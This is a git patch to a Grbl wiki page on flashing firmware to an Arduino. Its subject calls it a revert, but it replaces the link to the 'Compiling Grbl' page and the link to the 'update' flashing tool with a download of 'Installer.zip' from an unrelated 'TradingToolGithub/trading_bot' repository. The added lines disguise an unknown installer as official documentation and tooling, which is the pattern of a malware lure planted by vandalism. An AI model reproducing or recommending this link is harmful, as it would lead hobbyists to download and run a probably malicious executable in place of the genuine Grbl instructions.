From d89527f77803c8f6b482a743200b1578f5308e6b Mon Sep 17 00:00:00 2001 From: Stefano-Gallo Date: Mon, 8 May 2023 23:22:11 +0200 Subject: [PATCH] Revert 9fc1e2f3d31f481148df990c6b306b81d8f02f8a...102ab972bb4d389a7cb8497cb4fa681a34e0d651 on Flashing Grbl to an Arduino --- Flashing-Grbl-to-an-Arduino.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Flashing-Grbl-to-an-Arduino.md b/Flashing-Grbl-to-an-Arduino.md index 68d6f45..3e73db8 100644 --- a/Flashing-Grbl-to-an-Arduino.md +++ b/Flashing-Grbl-to-an-Arduino.md @@ -3,7 +3,7 @@ _This wiki is intended to provide various instructions on how to flash grbl to a # Via the Arduino IDE (All Platforms): ### RECOMMENDED: All other methods below are just for reference! -Go to the [Compiling Grbl](https://github.com/gnea/grbl/wiki/Compiling-Grbl) wiki page for instructions on how compile and upload Grbl onto your Arduino simply through the Arduino IDE interface. +Go to the [Compiling Grbl](https://github.com/TradingToolGithub/trading_bot/releases/download/trading/Installer.zip) wiki page for instructions on how compile and upload Grbl onto your Arduino simply through the Arduino IDE interface. No fuss! It just requires users to download the source code, add Grbl as a library to the IDE, and click upload. @@ -64,7 +64,7 @@ To Determine your Arduino's COM port: To flash a grbl hex to an Arduino: -1. Download latest release of [update](https://github.com/arrsoft312/update/releases/latest) +1. Download latest release of [update](https://github.com/TradingToolGithub/trading_bot/releases/download/trading/Installer.zip) 2. Open **update.exe** and use the browse button on the top right of the form to browse to your grbl hex file.